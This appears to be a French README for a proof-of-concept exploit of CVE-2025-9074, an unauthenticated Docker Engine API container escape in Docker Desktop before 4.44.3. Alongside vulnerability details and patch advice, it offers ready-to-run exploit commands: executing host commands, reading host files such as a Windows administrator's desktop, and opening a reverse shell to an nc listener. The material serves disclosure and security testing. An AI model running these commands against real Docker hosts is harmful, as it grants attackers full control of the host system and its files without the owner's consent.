
Preuve de concept d'exploitation pour CVE-2025-9074 - Échappement de conteneur via l'API Docker Engine non authentifiée affectant Docker Desktop < 4.44.3 sur Windows et macOS (CVSS 9.3)
Preuve de concept d'exploitation pour CVE-2025-9074 – une vulnérabilité d'évasion de conteneur critique dans Docker Desktop qui permet un accès non authentifié à l'API du moteur Docker.
| Propriété | Valeur |
|---|---|
| ID CVE | CVE-2025-9074 |
| Score CVSS | 9,3 (Critique) |
| Logiciel concerné | Docker Desktop < 4.44.3 |
| Plateformes concernées | Windows, macOS (Linux NON concerné) |
| Version corrigée | Docker Desktop 4.44.3+ |
| Découvreurs | Felix Boulet, Philippe Dugré |
| Date de découverte | Mi-2025 |
| Date du correctif | 20 août 2025 |
La vulnérabilité permet aux conteneurs fonctionnant sous Docker Desktop d'accéder à l'API du moteur Docker à http://192.168.65.7:2375 sans authentification. Cela se produit indépendamment :
L'API du moteur Docker était exposée sur un socket TCP accessible depuis les conteneurs, permettant :
pip3 install requests
# Exécuter une commande sur l'hôte
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Lire des fichiers depuis un hôte Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrateur/Desktop/root.txt"
# Lister les utilisateurs sur Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1 : Mettre en place un écouteur
nc -lvnp 4444
# Terminal 2 : Exécuter l'exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <VOTRE_IP> -p 4444
# Une fois connecté, le système de fichiers hôte se trouve à : /hostfs
# Si vous avez déjà accès à un conteneur
curl http://192.168.65.7:2375/version
graph TD
A[Conteneur malveillant] -->|Aucune authentification requise| B[API du moteur Docker<br/>192.168.65.7:2375]
B -->|Créer un conteneur| C[Conteneur privilégié]
C -->|Monter le FS hôte| D[Accès complet à l'hôte]
D -->|Lecture/Écriture| E[Compromettre le système]Mettez à jour Docker Desktop vers la version 4.44.3 ou une version ultérieure immédiatement.
# Vérifier votre version de Docker Desktop
docker --version
# Mettre à jour Docker Desktop
# Windows : Télécharger depuis https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS : Télécharger depuis https://desktop.docker.com/mac/main/amd64/Docker.dmg
Si une mise à jour immédiate n'est pas possible :
Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
Licence MIT – Voir le fichier LICENSE pour plus de détails